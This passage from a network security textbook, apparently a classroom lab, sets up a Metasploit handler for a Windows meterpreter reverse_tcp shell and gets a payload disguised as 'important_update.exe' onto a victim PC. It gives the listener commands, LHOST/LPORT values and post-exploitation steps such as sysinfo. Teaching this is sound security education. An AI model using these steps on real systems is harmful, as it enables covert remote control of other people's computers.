- Applied Network Security
- Arthur Salmon Warun Levesque Michael McLafferty
- 235字
- 2021-07-02 23:31:02
Starting the listener
First, we need to start our listener:
- Open Metasploit by typing msfconsole.
- Type use exploit/multi/handler.
- As stated before, we will be using meterpreter reverse_tcp payload. To set the payload, type the following:
set payload windows /meterpreter/reverse_tcp
This module doesn't have any settings that we can touch by default, so we need to add a payload. This tells the module what sort of reverse shell we're listening for; it'll help manage it for us:

- use exploit/multi/handler: handles the incoming connection
- set payload windows/meterpreter/reverse_tcp: reverses the TCP payload
- show options: shows the available options to set
- We also need to set up the LHOST and LPORT and make sure they're the same as the ones you set up in Step 3.
Then type Set lhost 192.168.10.50 Set lport 8080:
Set lhost 192.168.10.50 Set lport 8080

- Our handler is ready to receive the connection on port 8080.
- Type exploit to start the exploit.
Make sure that you transfer the important_update.exe file with the payload onto the victim computer the best way you can. Please contact your professor for assistance if needed.
Run the payload on the victim PC:

- Run the important-update on Server 2012:

- When you send the exploit to the victim, and the victim executes it, we get this:

- Type ? on the terminal to see the options available:

- Type sysinfo to make sure you can get information from the victim PC:

推薦閱讀
- CTF實戰:技術、解題與進階
- 黑客攻防與電腦安全從新手到高手(微視頻+火力升級版)
- Rootkit和Bootkit:現代惡意軟件逆向分析和下一代威脅
- 黑客攻防入門秘笈
- 走進新安全:讀懂網絡安全威脅、技術與新思想
- 網絡安全三十六計:人人該懂的防黑客技巧
- Digital Forensics with Kali Linux
- Kerberos域網絡安全從入門到精通
- 安全防御入門手冊
- 網絡安全態勢感知
- 網絡關鍵設備安全檢測實施指南
- INSTANT Apple Configurator How-to
- Disaster Recovery Using VMware vSphere Replication and vCenter Site Recovery Manager
- 隱私保護機器學習
- 黑客攻防從入門到精通:黑客與反黑客工具篇(第2版)